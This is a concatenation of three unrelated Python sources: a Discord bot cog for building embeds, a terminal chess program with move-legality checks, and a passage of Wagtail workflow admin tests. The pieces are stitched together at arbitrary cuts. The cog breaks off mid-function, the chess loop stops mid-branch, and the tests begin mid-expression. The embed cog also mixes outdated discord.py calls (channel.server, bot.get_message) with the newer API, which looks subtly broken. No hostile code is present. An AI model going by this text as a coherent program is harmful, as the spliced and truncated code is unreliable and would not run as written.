import json import textwrap import typing as t from collections import defaultdict from contextlib import suppress from discord import Color, Embed, Member, TextChannel, Forbidden from discord.errors import HTTPException from discord.ext.commands import Cog, ColourConverter, Context, group from bot.core.bot import Bot from bot.core.converters import Unicode class EmbedData(t.NamedTuple): """Data for user embeds.""" content: str embed: Embed class JsonEmbedParser: """This class is used for converting json into embed and vice versa.""" def __init__(self, ctx: Context, json_dict: dict) -> None: self.ctx = ctx self.json = JsonEmbedParser.process_dict(json_dict) @classmethod async def from_str(cls: "JsonEmbedParser", ctx: Context, json_string: str) -> t.Union["JsonEmbedParser", bool]: """Return class instance from json string. This will return either class instance (on correct json string), or False on incorrect json string. """ json_dict = await cls.parse_json(ctx, json_string) if json_dict is False: return False return cls(ctx, json_dict) @classmethod def from_embed(cls: "JsonEmbedParser", ctx: Context, embed: t.Union[Embed, EmbedData]) -> "JsonEmbedParser": """Return class instance from embed.""" if isinstance(embed, EmbedData): embed_dict = embed.embed.to_dict() json_dict = {"content": embed.content, "embed": embed_dict} else: json_dict = embed.to_dict() return cls(ctx, json_dict) @staticmethod async def parse_json(ctx: Context, json_code: str) -> t.Union[dict, bool]: """Parse given json code.""" # Sanitize code (remove codeblocks if any) if "```" in json_code: json_code = json_code.replace("```json\n", "") json_code = json_code.replace("```\n", "") json_code = json_code.replace("```json", "") json_code = json_code.replace("```", "") # Parse the code into JSON try: return json.loads(json_code) except json.JSONDecodeError as error: lines = json_code.split("\n") embed = Embed( description=textwrap.dedent( f""" Sorry, I couldn't parse this JSON: ``` {error} ``` The error seems to be here *(`line: {error.lineno} col: {error.colno}`)*: ``` {lines[error.lineno - 1]} {" " * (int(error.colno) - 1)}^ ``` """ ), color=Color.red(), ) await ctx.send(f"Sorry {ctx.author.mention}", embed=embed) return False @staticmethod def process_dict(json_dct: dict) -> dict: """Set all values to Embed.Empty to avoid keyerrors.""" try: content = json_dct["content"] except KeyError: content = "" try: new_json = json_dct["embed"] except KeyError: new_json = json_dct # Set default type to "rich" if "type" not in new_json: new_json["type"] = "rich" # TODO: Correctly implement timestampts # Current override will cause errors in make_json if "timestamp" in new_json: new_json["timestamp"] = Embed.Empty return {"content": content, "embed": new_json} def make_embed(self) -> EmbedData: """Produce an embed from the processed json.""" embed = Embed.from_dict(self.json["embed"]) return EmbedData(self.json["content"], embed) def make_json(self) -> str: """Make it json.""" return json.dumps(self.json, indent=2) class Embeds(Cog): """A Cog which provides the ability to build a custom embed.""" def __init__(self, bot: Bot) -> None: self.bot = bot # Provide an empty embed for every member (key) self.embeds = defaultdict(lambda: EmbedData("", Embed())) # Provide a default ID of -1 for every member (key) for embed fields # setting it to -1 is necessary because adding embed only increments this # default value of -1 ensures start on 0 self.embed_fields = defaultdict(lambda: -1) @group(invoke_without_command=True, name="embed", aliases=["embedset", "set_embed"]) async def embed_group(self, ctx: Context) -> None: """Commands for configuring the Embed messages.""" await ctx.send("This command is not meant to be used on its own!") # region: basic embed settings (title, description, footer, image, color, message) @embed_group.command(aliases=["set_title"]) async def title(self, ctx: Context, *, title: Unicode) -> None: """Set Title for the Embed.""" self.embeds[ctx.author].embed.title = title await ctx.send("Embeds title updated.") @embed_group.command(aliases=["set_description"], name="description") async def _description(self, ctx: Context, *, description: Unicode) -> None: """Set Description for the Embed.""" self.embeds[ctx.author].embed.description = description await ctx.send("Embeds description updated.") @embed_group.command(aliases=["add_description"]) async def append_description(self, ctx: Context, *, description: Unicode) -> None: """Add text into Description of the Embed.""" self.embeds[ctx.author].embed.description += description await ctx.send("Embeds description appended.") @embed_group.command(aliases=["set_footer"]) async def footer(self, ctx: Context, *, footer: Unicode) -> None: """Set Footer for the Embed.""" self.embeds[ctx.author].embed.set_footer(text=footer) await ctx.send("Embeds footer updated.") @embed_group.command(aliases=["set_image"]) async def image(self, ctx: Context, url: str) -> None: """Set image for the Embed.""" self.embeds[ctx.author].embed.set_image(url=url) await ctx.send("Embeds image updated.") @embed_group.command(aliases=["set_color"]) async def color(self, ctx: Context, color: ColourConverter) -> None: """Set color for the Embed. `color` can be HEX color code or some of the standard colors (red, blue, ...). """ self.embeds[ctx.author].embed.colour = color await ctx.send("Embeds color updated.") @embed_group.command(aliases=["content", "msg"]) async def message(self, ctx: Context, *, message: str) -> None: """Set message content for the Embed.""" self.embeds[ctx.author] = EmbedData(message, self.embeds[ctx.author].embed) await ctx.send("Message content updated.") # endregion # region: author settings @embed_group.group(invoke_without_command=True, name="author", aliases=["authorset", "set_author"]) async def author_group(self, ctx: Context) -> None: """Commands for configuring the author of Embed messages.""" await ctx.send("This command is not meant to be used on its own!") @author_group.command(name="name", aliases=["set_name"]) async def author_name(self, ctx: Context, *, author_name: str) -> None: """Set author's name for the Embed.""" embed = self.embeds[ctx.author].embed embed.set_author(name=author_name, url=embed.author.url, icon_url=embed.author.icon_url) await ctx.send("Embeds author updated.") @author_group.command(name="url", aliases=["set_url"]) async def author_url(self, ctx: Context, author_url: str) -> None: """Set author's URL for Embed.""" embed = self.embeds[ctx.author].embed embed.set_author(name=embed.author.name, url=author_url, icon_url=embed.author.icon_url) await ctx.send("Embeds author URL updated.") @author_group.command(name="icon", aliases=["set_icon"]) async def author_icon(self, ctx: Context, author_icon: t.Union[Member, str]) -> None: """Set author's icon in the Embed. `author_icon` can either be URL to the image or you can mention a user to get his avatar """ if isinstance(author_icon, Member): author_icon = author_icon.avatar_url_as(format="png") embed = self.embeds[ctx.author].embed embed.set_author(name=embed.author.name, url=embed.author.url, icon_url=author_icon) await ctx.send("Embeds author icon updated.") # endregion # region: field settings @embed_group.group(invoke_without_command=True, name="field", aliases=["filedset", "set_field"]) async def field_group(self, ctx: Context) -> None: """Group for field-related actions.""" await ctx.send("This command is not meant to be used on its own!") @field_group.command(name="add") async def field_add(self, ctx: Context, *, title: t.Optional[Unicode] = None) -> None: """Create new field in Embed.""" self.embeds[ctx.author].embed.add_field(name=title, value="") self.embed_fields[ctx.author] += 1 await ctx.send(f"Embeds field **#{self.embed_fields[ctx.author]}** created") @field_group.command(name="remove", aliases=["delete", "rem", "del"]) async def field_remove(self, ctx: Context, ID: int) -> None: """Remove field with specific `ID` from Embed.""" if 0 <= ID <= self.embed_fields[ctx.author]: self.embeds[ctx.author].embed.remove_field(ID) self.embed_fields[ctx.author] -= 1 await ctx.send(f"Embeds field **#{ID}** has been removed.") else: await ctx.send(f"Embeds field **#{ID}** doesn't exist.") @field_group.command(name="description", aliases=["set_description", "value", "set_value"]) async def field_description(self, ctx: Context, ID: int, *, description: Unicode) -> None: """Set a description for embeds field #`ID`.""" if 0 <= ID <= self.embed_fields[ctx.author]: embed = self.embeds[ctx.author].embed embed.set_field_at( ID, name=embed.fields[ID].name, value=description, inline=embed.fields[ID].inline ) await ctx.send(f"Embeds field **#{ID}** description updated.") else: await ctx.send(f"Embeds field **#{ID}** doesn't exist.") @field_group.command(name="append_description", aliases=["add_description", "add_value"]) async def field_append_description(self, ctx: Context, ID: int, *, description: Unicode) -> None: """Set a description for embeds field #`ID`.""" if 0 <= ID <= self.embed_fields[ctx.author]: embed = self.embeds[ctx.author].embed embed.set_field_at( ID, name=embed.fields[ID].name, value=embed.fields[ID].value + description, inline=embed.fields[ID].inline ) await ctx.send(f"Embeds field **#{ID}** description appended.") else: await ctx.send(f"Embeds field **#{ID}** doesn't exist.") @field_group.command(name="title", aliases=["set_title", "name", "set_name"]) async def field_title(self, ctx: Context, ID: int, *, title: Unicode) -> None: """Set a title for embeds field #`ID`.""" if 0 <= ID <= self.embed_fields[ctx.author]: embed = self.embeds[ctx.author].embed embed.set_field_at( ID, name=title, value=embed.fields[ID].value, inline=embed.fields[ID].inline ) await ctx.send(f"Embeds field **#{ID}** description updated.") else: await ctx.send(f"Embeds field **#{ID}** doesn't exist.") @field_group.command(name="inline", aliases=["set_inline", "in_line", "set_in_line"]) async def field_inline(self, ctx: Context, ID: int, inline_status: bool) -> None: """Choose if embed field #`ID` should be inline or not""" if 0 <= ID <= self.embed_fields[ctx.author]: embed = self.embeds[ctx.author].embed embed.set_field_at( ID, name=embed.fields[ID].name, value=embed.fields[ID].value, inline=inline_status ) await ctx.send(f"Embeds field **#{ID}** is now {'' if inline_status else 'not'} inline") else: await ctx.send(f"Embeds field **#{ID}** doesn't exist.") # endregion # region: json @embed_group.command(aliases=["json_load", "from_json", "json", "import"]) async def load(self, ctx: Context, *, json_code: str) -> None: """Generate Embed from given JSON code.""" embed_parser = await JsonEmbedParser.from_str(ctx, json_code) if embed_parser is not False: self.embeds[ctx.author] = embed_parser.make_embed() await ctx.send("Embed updated accordingly to provided JSON") else: await ctx.send("Invalid embed JSON") @embed_group.command(aliases=["json_dump", "to_json", "get_json", "export"]) async def dump(self, ctx: Context) -> None: """Export JSON from current Embed.""" embed_parser = JsonEmbedParser.from_embed(ctx, self.embeds[ctx.author]) json = embed_parser.make_json() await ctx.send(f"```json\n{json}```") @embed_group.command() async def message_dump(self, ctx: Context, channel: TextChannel, message_id: int) -> None: """Dump an embed with it's ID.""" member = channel.server and channel.server.get_member(ctx.message.author.id) if channel != ctx.message.channel and not member: await ctx.send("Private Channel, or Invalid Server.") return with suppress(Forbidden): msg = await self.bot.get_message(channel, str(message_id)) if msg.author.id != self.bot.user.id: await ctx.send("Invalid User's Message.") return elif not msg.embeds: await ctx.send("No embeds in The Message.") return embed_parser = JsonEmbedParser.from_embed(ctx, msg) json = embed_parser.make_json() await ctx.send(f"```json\n{json}```") # endregion # region: showing, sending, resetting async def send_embed(self, author: Member, channel: TextChannel) -> bool: """Send the Embed.""" try: await channel.send(self.embeds[author].content, embed=self.embeds[author].embed)
#!/usr/bin/env python """ TUI based Python Chess Program """ from __future__ import print_function import os CLEAR='clear' # CLEAR='cls' # For Windows ch = [[' '] * 8 for i in range(8)] def init(): ch[0][0] = 'R ' ch[0][1] = 'N ' ch[0][2] = 'B ' ch[0][3] = 'Q ' ch[0][4] = 'K ' ch[0][5] = 'B ' ch[0][6] = 'N ' ch[0][7] = 'R ' for i in range(8): ch[1][i] = 'P ' ch[7][0] = 'r ' ch[7][1] = 'n ' ch[7][2] = 'b ' ch[7][3] = 'q ' ch[7][4] = 'k ' ch[7][5] = 'b ' ch[7][6] = 'n ' ch[7][7] = 'r ' for i in range(8): ch[6][i] = 'p ' init() """An important note must be made that 'P '.isupper() and 'p '.islower(), both would give True. Whereas, ' ', '* ' would give False for both islower() and isupper() methods.""" def disp(turn_to_play): os.system(CLEAR) print(" +" + "-----+" * 8) if turn_to_play == 'w': for i in range(7, -1, -1): print(i + 1, "| ", str(ch[i]).lstrip("['").rstrip("]'").replace("', '", " | "), "|") print(" |" + " |" * 8) print(" +" + "-----+" * 8) print(" a b c d e f g h") elif turn_to_play == 'b': for i in range(8): print(i + 1, "| ", str(ch[i][-1::-1]).lstrip("['").rstrip("]'").replace("', '", " | "), "|") print(" |" + " |" * 8) print(" +" + "-----+" * 8) print(" h g f e d c b a") def c(x, y): """Returns 1 if x < y and -1 if x > y.""" return (y - x) // abs(y - x) def move(ini, fin): ch[fin[0]][fin[1]] = ch[ini[0]][ini[1]] ch[ini[0]][ini[1]] = ' ' def add_stars(positions): for pos in positions: ch[pos[0]][pos[1]] = '*' + ch[pos[0]][pos[1]][0] def remove_stars(positions): for pos in positions: ch[pos[0]][pos[1]] = ch[pos[0]][pos[1]][1] + " " def empty(piece): """To check if given piece is empty Necessary because an empty position can be both ' ' or '* ' """ if piece == ' ' or piece == '* ': return True return False def on_attack(ini, fin): """To check if position at fin is under attack by piece by ini. If fin is under attack does not mean that the piece (under attack/movable) at ini can move over to fin since doing that can put a check on it's own king. This is checked in the legal(ini, fin) function.""" global ep_pos i_piece = ch[ini[0]][ini[1]] # Piece at ini f_piece = ch[fin[0]][fin[1]] # Piece at fin # Try to get the en-passant activated pawn if there is no IndexError given by default position (9, 9). try: ep_pawn = ch[ep_pos[0]][ep_pos[1]] except IndexError: ep_pawn = " " # Initial and Final Positions should not be same if ini == fin: return False # Condition that a piece cannot attack it's own team member if (i_piece.isupper() and f_piece.isupper()) or (i_piece.islower() and f_piece.islower()): return False # Condition for Pawns if i_piece == 'P ': if (fin[0] == ini[0] + 1 and fin[1] == ini[1] and empty(f_piece)) or ( fin[0] == ini[0] + 1 and abs(fin[1] - ini[1]) == 1 and not empty(f_piece)) or ( abs(ini[1] - ep_pos[1]) == 1 and ini[0] == ep_pos[0] and fin[0] == ini[0] + 1 and fin[1] == ep_pos[1] and ep_pawn.islower()) or( ini[0] == 1 and fin[0] == 3 and ini[1] == fin[1] and empty(ch[2][ini[1]]) and empty(f_piece)): return True else: return False elif i_piece == 'p ': if (fin[0] == ini[0] - 1 and fin[1] == ini[1] and empty(f_piece)) or ( fin[0] == ini[0] - 1 and abs(fin[1] - ini[1]) == 1 and not empty(f_piece)) or( abs(ini[1] - ep_pos[1]) == 1 and ini[0] == ep_pos[0] and fin[0] == ini[0] - 1 and fin[1] == ep_pos[1] and ep_pawn.isupper()) or( ini[0] == 6 and fin[0] == 4 and ini[1] == fin[1] and empty(ch[5][ini[1]]) and empty(f_piece)): return True else: return False # Condition for Rooks elif i_piece == 'r ' or i_piece == 'R ': if ini[0] == fin[0]: for i in range(ini[1] + c(ini[1], fin[1]), fin[1], c(ini[1], fin[1])): if not empty(ch[ini[0]][i]): return False return True elif ini[1] == fin[1]: for i in range(ini[0] + c(ini[0], fin[0]), fin[0], c(ini[0], fin[0])): if not empty(ch[i][ini[1]]): return False return True else: return False # Condition for Bishops elif i_piece == 'b ' or i_piece == 'B ': if abs(fin[0] - ini[0]) == abs(fin[1] - ini[1]): i_increment = c(ini[0], fin[0]) j_increment = c(ini[1], fin[1]) i = ini[0] + i_increment j = ini[1] + j_increment while i != fin[0]: if not empty(ch[i][j]): return False i += i_increment j += j_increment return True else: return False # Conditions for Queens # Either one of Rook or Bishop Conditions should be satisfied elif i_piece == 'q ' or i_piece == 'Q ': # Condition for Rook ch[ini[0]][ini[1]] = 'r ' if i_piece == 'q ' else 'R ' legal1 = on_attack(ini, fin) # Condition for Bishop ch[ini[0]][ini[1]] = 'b ' if ch[ini[0]][ini[1]] == 'r ' else 'B ' legal2 = on_attack(ini, fin) # Convert the piece back to normal ch[ini[0]][ini[1]] = 'q ' if ch[ini[0]][ini[1]] == 'b ' else 'Q ' return legal1 or legal2 # Condition for Knights elif i_piece == 'n ' or i_piece == 'N ': if (abs(fin[0] - ini[0]) == 2 and abs(fin[1] - ini[1]) == 1) or ( abs(fin[0] - ini[0]) == 1 and abs(fin[1] - ini[1]) == 2): return True else: return False # Condition for Kings elif i_piece == 'k ' or i_piece == 'K ': if abs(fin[1] - ini[1]) <= 1 and abs(fin[0] - ini[0]) <= 1: return True else: return False def is_forbid_king(k_piece): """Given the king, the function returns if that king is under check or not""" for i in range(8): for j in range(8): if ch[i][j] == k_piece: pos_king = i, j break for i in range(8): for j in range(8): if ch[i][j].isupper() and k_piece.islower() or ch[i][j].islower() and k_piece.isupper(): if on_attack((i, j), pos_king): return True return False def legal(ini, fin): """If position at fin is under attack by piece at ini, this function checks whether moving the piece at ini to fin is legal or not. It might not be legal because moving there would put it's own king under check.""" """To check that, we move the piece at ini to fin without displaying and check whether that configuration puts the piece's king under check.""" if not on_attack(ini, fin): return False piece_at_fin = ch[fin[0]][fin[1]] move(ini, fin) if ch[fin[0]][fin[1]].islower() and is_forbid_king('k '): move(fin, ini) ch[fin[0]][fin[1]] = piece_at_fin return False if ch[fin[0]][fin[1]].isupper() and is_forbid_king('K '): move(fin, ini) ch[fin[0]][fin[1]] = piece_at_fin return False move(fin, ini) ch[fin[0]][fin[1]] = piece_at_fin return True def possible_moves(ini): """Gives all the legal movable positions of the piece at ini.""" possible_mov = [] for i in range(8): for j in range(8): if legal(ini, (i, j)): possible_mov.append((i, j)) return possible_mov def input_valid(inp): if len(inp) != 2 or (inp[0] not in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']) or ( inp[1] not in ['1', '2', '3', '4', '5', '6', '7', '8']): return False return True def under_check_func(): """To check whether a check was put under check in the previous turn.""" global turn if is_forbid_king('k ') and turn == 'b': return True elif is_forbid_king('K ') and turn == 'w': return True return False def legalmov_left_func(): """To check if any legal move is left for the current turn.""" global turn if turn == 'b': for i in range(8): for j in range(8): if ch[i][j].islower() and possible_moves((i, j)) != []: return True elif turn == 'w': for i in range(8): for j in range(8): if ch[i][j].isupper() and possible_moves((i, j)) != []: return True return False turn = 'w' ep_pos = (9, 9) """ep_pos will give the position of en-passant activated pawn. (9, 9) index means no pawn is activated. ch[9][9] would give IndexError but it is not at distance 1 from any column on chess board which is what we have used in the on_attack() function.""" while True: disp(turn) under_check = under_check_func() legalmov_left = legalmov_left_func() if not legalmov_left and not under_check: print("\nStalemate. Draw.") input() break if under_check:
value in context.items() } self.assertEqual( full_context["message"], "Sorry, you do not have permission to access this area.", ) self.login(user=self.moderator) response = self.get() self.assertEqual(response.status_code, 200) class TestCreateTaskView(TestCase, WagtailTestUtils): def setUp(self): delete_existing_workflows() self.login() self.editor = self.create_user( username="editor", email="<EMAIL>", password="password", ) editors = Group.objects.get(name="Editors") editors.user_set.add(self.editor) self.moderator = self.create_user( username="moderator", email="<EMAIL>", password="password", ) moderators = Group.objects.get(name="Moderators") moderators.user_set.add(self.moderator) moderators.permissions.add(Permission.objects.get(codename="add_task")) def get(self, url_kwargs=None, params={}): url_kwargs = url_kwargs or {} url_kwargs.setdefault("app_label", SimpleTask._meta.app_label) url_kwargs.setdefault("model_name", SimpleTask._meta.model_name) return self.client.get( reverse("wagtailadmin_workflows:add_task", kwargs=url_kwargs), params ) def post(self, post_data={}): return self.client.post( reverse( "wagtailadmin_workflows:add_task", kwargs={ "app_label": SimpleTask._meta.app_label, "model_name": SimpleTask._meta.model_name, }, ), post_data, ) def test_get(self): response = self.get() self.assertEqual(response.status_code, 200) self.assertTemplateUsed(response, "wagtailadmin/workflows/create_task.html") def test_get_with_non_task_model(self): response = self.get( url_kwargs={"app_label": "wagtailcore", "model_name": "Site"} ) self.assertEqual(response.status_code, 404) def test_get_with_base_task_model(self): response = self.get( url_kwargs={"app_label": "wagtailcore", "model_name": "Task"} ) self.assertEqual(response.status_code, 404) def test_post(self): response = self.post({"name": "test_task", "active": "on"}) # Should redirect back to index self.assertRedirects(response, reverse("wagtailadmin_workflows:task_index")) # Check that the task was created tasks = Task.objects.filter(name="test_task", active=True) self.assertEqual(tasks.count(), 1) def test_permissions(self): self.login(user=self.editor) response = self.get() self.assertEqual(response.status_code, 302) full_context = { key: value for context in response.context for key, value in context.items() } self.assertEqual( full_context["message"], "Sorry, you do not have permission to access this area.", ) self.login(user=self.moderator) response = self.get() self.assertEqual(response.status_code, 200) class TestSelectTaskTypeView(TestCase, WagtailTestUtils): def setUp(self): delete_existing_workflows() self.login() def get(self): return self.client.get(reverse("wagtailadmin_workflows:select_task_type")) def test_get(self): response = self.get() self.assertEqual(response.status_code, 200) self.assertTemplateUsed( response, "wagtailadmin/workflows/select_task_type.html" ) # Check that the list of available task types includes SimpleTask and GroupApprovalTask self.assertContains(response, SimpleTask.get_verbose_name()) self.assertContains(response, GroupApprovalTask.get_verbose_name()) self.assertContains(response, GroupApprovalTask.get_description()) class TestEditTaskView(TestCase, WagtailTestUtils): def setUp(self): delete_existing_workflows() self.login() self.task = GroupApprovalTask.objects.create(name="test_task") self.editor = self.create_user( username="editor", email="<EMAIL>", password="password", ) editors = Group.objects.get(name="Editors") editors.user_set.add(self.editor) self.moderator = self.create_user( username="moderator", email="<EMAIL>", password="password", ) moderators = Group.objects.get(name="Moderators") moderators.user_set.add(self.moderator) moderators.permissions.add(Permission.objects.get(codename="change_task")) def get(self, params={}): return self.client.get( reverse("wagtailadmin_workflows:edit_task", args=[self.task.id]), params ) def post(self, post_data={}): return self.client.post( reverse("wagtailadmin_workflows:edit_task", args=[self.task.id]), post_data ) def test_get(self): response = self.get() self.assertEqual(response.status_code, 200) self.assertTemplateUsed(response, "wagtailadmin/workflows/edit_task.html") def test_post(self): self.assertEqual(self.task.groups.count(), 0) editors = Group.objects.get(name="Editors") response = self.post( {"name": "test_task_modified", "active": "on", "groups": [str(editors.id)]} ) # Should redirect back to index self.assertRedirects(response, reverse("wagtailadmin_workflows:task_index")) # Check that the task was updated task = GroupApprovalTask.objects.get(id=self.task.id) # The task name cannot be changed self.assertEqual(task.name, "test_task") # This request should've added a group to the task self.assertEqual(task.groups.count(), 1) self.assertTrue(task.groups.filter(id=editors.id).exists()) def test_permissions(self): self.login(user=self.editor) response = self.get() self.assertEqual(response.status_code, 302) full_context = { key: value for context in response.context for key, value in context.items() } self.assertEqual( full_context["message"], "Sorry, you do not have permission to access this area.", ) self.login(user=self.moderator) response = self.get() self.assertEqual(response.status_code, 200) def test_admin_url_finder(self): editor_url_finder = AdminURLFinder(self.editor) self.assertIsNone(editor_url_finder.get_edit_url(self.task)) moderator_url_finder = AdminURLFinder(self.moderator) expected_url = "/admin/workflows/tasks/edit/%d/" % self.task.pk self.assertEqual(moderator_url_finder.get_edit_url(self.task), expected_url) class TestSubmitToWorkflow(TestCase, WagtailTestUtils): def setUp(self): delete_existing_workflows() self.submitter = self.create_user( username="submitter", email="<EMAIL>", password="password", ) editors = Group.objects.get(name="Editors") editors.user_set.add(self.submitter) self.moderator = self.create_user( username="moderator", email="<EMAIL>", password="password", ) moderators = Group.objects.get(name="Moderators") moderators.user_set.add(self.moderator) self.superuser = self.create_superuser( username="superuser", email="<EMAIL>", password="password", ) self.login(user=self.submitter) # Create a page root_page = Page.objects.get(id=2) self.page = SimplePage( title="Hello world!", slug="hello-world", content="hello", live=False, has_unpublished_changes=True, ) root_page.add_child(instance=self.page) self.page.save_revision() self.workflow, self.task_1, self.task_2 = self.create_workflow_and_tasks() WorkflowPage.objects.create(workflow=self.workflow, page=self.page) def create_workflow_and_tasks(self): workflow = Workflow.objects.create(name="test_workflow") task_1 = GroupApprovalTask.objects.create(name="test_task_1") task_2 = GroupApprovalTask.objects.create(name="test_task_2") task_1.groups.set(Group.objects.filter(name="Moderators")) task_2.groups.set(Group.objects.filter(name="Moderators")) WorkflowTask.objects.create(workflow=workflow, task=task_1, sort_order=1) WorkflowTask.objects.create(workflow=workflow, task=task_2, sort_order=2) return workflow, task_1, task_2 def submit(self): post_data = { "title": str(self.page.title), "slug": str(self.page.slug), "content": str(self.page.content), "action-submit": "True", } return self.client.post( reverse("wagtailadmin_pages:edit", args=(self.page.id,)), post_data ) def test_submit_for_approval_creates_states(self): """Test that WorkflowState and TaskState objects are correctly created when a Page is submitted for approval""" self.submit() workflow_state = self.page.current_workflow_state self.assertEqual(type(workflow_state), WorkflowState) self.assertEqual(workflow_state.workflow, self.workflow) self.assertEqual(workflow_state.status, workflow_state.STATUS_IN_PROGRESS) self.assertEqual(workflow_state.requested_by, self.submitter) task_state = workflow_state.current_task_state self.assertEqual(type(task_state), TaskState) self.assertEqual(task_state.task.specific, self.task_1) self.assertEqual(task_state.status, task_state.STATUS_IN_PROGRESS) def test_submit_for_approval_changes_status_in_status_side_panel_meta(self): edit_url = reverse("wagtailadmin_pages:edit", args=(self.page.id,)) response = self.client.get(edit_url) self.assertContains(response, "Draft", count=1) # submit for approval self.submit() response = self.client.get(edit_url) self.assertRegex( response.content.decode("utf-8"), r"Sent to[\s|\n]+{}".format(self.page.current_workflow_task.name), ) self.assertNotContains(response, "Draft") def test_submit_sends_mail(self): self.submit() # 3 emails sent: # - to moderator - submitted for approval in moderation stage test_task_1 # - to superuser - submitted for approval in moderation stage test_task_1 # - to superuser - submitted to workflow test_workflow self.assertEqual(len(mail.outbox), 3) # the 'submitted to workflow' email should include the submitter's name workflow_message = None for msg in mail.outbox: if ( msg.subject == 'The page "Hello world! (simple page)" has been submitted to workflow "test_workflow"' ): workflow_message = msg break self.assertTrue(workflow_message) self.assertIn( 'The page "Hello world! (simple page)" has been submitted for moderation to workflow "test_workflow" by submitter', workflow_message.body, ) @mock.patch.object( EmailMultiAlternatives, "send", side_effect=IOError("Server down") ) def test_email_send_error(self, mock_fn): logging.disable(logging.CRITICAL) response = self.submit() logging.disable(logging.NOTSET) # An email that fails to send should return a message rather than crash the page self.assertEqual(response.status_code, 302) response = self.client.get(reverse("wagtailadmin_home")) def test_resume_rejected_workflow(self): # test that an existing workflow can be resumed by submitting when rejected self.workflow.start(self.page, user=self.submitter) workflow_state = self.page.current_workflow_state workflow_state.current_task_state.approve(user=self.superuser) workflow_state.refresh_from_db() workflow_state.current_task_state.reject(user=self.superuser) workflow_state.refresh_from_db() self.assertEqual(workflow_state.current_task_state.task.specific, self.task_2) self.assertEqual(workflow_state.status, WorkflowState.STATUS_NEEDS_CHANGES) self.submit() workflow_state.refresh_from_db() # check that the same workflow state's status is now in progress self.assertEqual(workflow_state.status, WorkflowState.STATUS_IN_PROGRESS) # check that the workflow remains on the rejecting task, rather than resetting self.assertEqual(workflow_state.current_task_state.task.specific, self.task_2) def test_restart_rejected_workflow(self): # test that an existing workflow can be restarted when rejected self.workflow.start(self.page, user=self.submitter) workflow_state = self.page.current_workflow_state workflow_state.current_task_state.approve(user=self.superuser) workflow_state.refresh_from_db() workflow_state.current_task_state.reject(user=self.superuser) workflow_state.refresh_from_db() self.assertEqual(workflow_state.current_task_state.task.specific, self.task_2) self.assertEqual(workflow_state.status, WorkflowState.STATUS_NEEDS_CHANGES) post_data = { "title": str(self.page.title), "slug": str(self.page.slug), "content": str(self.page.content), "action-restart-workflow": "True", } self.client.post( reverse("wagtailadmin_pages:edit", args=(self.page.id,)), post_data ) workflow_state.refresh_from_db() # check that the same workflow state's status is now cancelled self.assertEqual(workflow_state.status, WorkflowState.STATUS_CANCELLED) # check that the new workflow has started on the first task new_workflow_state = self.page.current_workflow_state self.assertEqual(new_workflow_state.status, WorkflowState.STATUS_IN_PROGRESS) self.assertEqual( new_workflow_state.current_task_state.task.specific, self.task_1 ) def test_cancel_workflow(self): # test that an existing workflow can be cancelled after submission by the submitter self.workflow.start(self.page, user=self.submitter) workflow_state = self.page.current_workflow_state self.assertEqual(workflow_state.current_task_state.task.specific, self.task_1) self.assertEqual(workflow_state.status, WorkflowState.STATUS_IN_PROGRESS) post_data = { "title": str(self.page.title), "slug": str(self.page.slug), "content": str(self.page.content), "action-cancel-workflow": "True", } self.client.post( reverse("wagtailadmin_pages:edit", args=(self.page.id,)), post_data ) workflow_state.refresh_from_db() # check that the workflow state's status is now cancelled self.assertEqual(workflow_state.status, WorkflowState.STATUS_CANCELLED) self.assertEqual( workflow_state.current_task_state.status, TaskState.STATUS_CANCELLED ) def test_email_headers(self): # Submit self.submit() msg_headers = set(mail.outbox[0].message().items()) headers = {("Auto-Submitted", "auto-generated")} self.assertTrue( headers.issubset(msg_headers), msg="Message is missing the Auto-Submitted header.", ) @freeze_time("2020-03-31 12:00:00") class TestApproveRejectWorkflow(TestCase, WagtailTestUtils): def setUp(self): delete_existing_workflows() self.submitter = self.create_user( username="submitter", first_name="Sebastian", last_name="Mitter", email="<EMAIL>", password="password", ) editors = Group.objects.get(name="Editors") editors.user_set.add(self.submitter) self.moderator = self.create_user( username="moderator", email="<EMAIL>", password="password", ) moderators = Group.objects.get(name="Moderators") moderators.user_set.add(self.moderator) self.superuser = self.create_superuser( username="superuser", email="<EMAIL>", password="password", ) self.login(user=self.submitter) # Create a page root_page = Page.objects.get(id=2) self.page = SimplePage( title="Hello world!", slug="hello-world", content="hello", live=False, has_unpublished_changes=True, ) root_page.add_child(instance=self.page) self.workflow, self.task_1 = self.create_workflow_and_tasks() WorkflowPage.objects.create(workflow=self.workflow, page=self.page) self.submit() self.login(user=self.moderator) def create_workflow_and_tasks(self): workflow = Workflow.objects.create(name="test_workflow") task_1 = GroupApprovalTask.objects.create(name="test_task_1") task_1.groups.set(Group.objects.filter(name="Moderators")) WorkflowTask.objects.create(workflow=workflow, task=task_1, sort_order=1) return workflow, task_1 def submit(self): post_data = { "title": str(self.page.title), "slug": str(self.page.slug), "content": str(self.page.content), "action-submit": "True", } return self.client.post( reverse("wagtailadmin_pages:edit", args=(self.page.id,)), post_data ) @override_settings(WAGTAIL_FINISH_WORKFLOW_ACTION="") def test_approve_task_and_workflow(self): """ This posts to the approve task view and checks that the page was approved and published """ # Unset WAGTAIL_FINISH_WORKFLOW_ACTION - default action should be to publish del settings.WAGTAIL_FINISH_WORKFLOW_ACTION # Connect a mock signal handler to page_published signal mock_handler = mock.MagicMock() page_published.connect(mock_handler) # Post self.client.post( reverse( "wagtailadmin_pages:workflow_action", args=( self.page.id, "approve", self.page.current_workflow_task_state.id, ), ), {"comment": "my comment"}, ) # Check that the workflow was approved workflow_state = WorkflowState.objects.get( page=self.page, requested_by=self.submitter ) self.assertEqual(workflow_state.status, workflow_state.STATUS_APPROVED) # Check that the task was approved task_state = workflow_state.current_task_state self.assertEqual(task_state.status, task_state.STATUS_APPROVED) # Check that the comment was added to the task state correctly self.assertEqual(task_state.comment, "my comment") page = Page.objects.get(id=self.page.id) # Page must be live self.assertTrue(page.live, "Approving moderation failed to set live=True") # Page should now have no unpublished changes self.assertFalse( page.has_unpublished_changes, "Approving moderation failed to set has_unpublished_changes=False", ) # Check that the page_published signal was fired self.assertEqual(mock_handler.call_count, 1) mock_call = mock_handler.mock_calls[0][2] self.assertEqual(mock_call["sender"], self.page.specific_class) self.assertEqual(mock_call["instance"], self.page) self.assertIsInstance(mock_call["instance"], self.page.specific_class) def test_workflow_dashboard_panel(self): response = self.client.get(reverse("wagtailadmin_home")) self.assertContains(response, "Awaiting your review") # check that ActivateWorkflowActionsForDashboard is present and passes a valid csrf token self.assertRegex( response.content.decode("utf-8"), r"ActivateWorkflowActionsForDashboard\(\'\w+\'\)", ) def test_workflow_action_get(self): """ This tests that a GET request to the 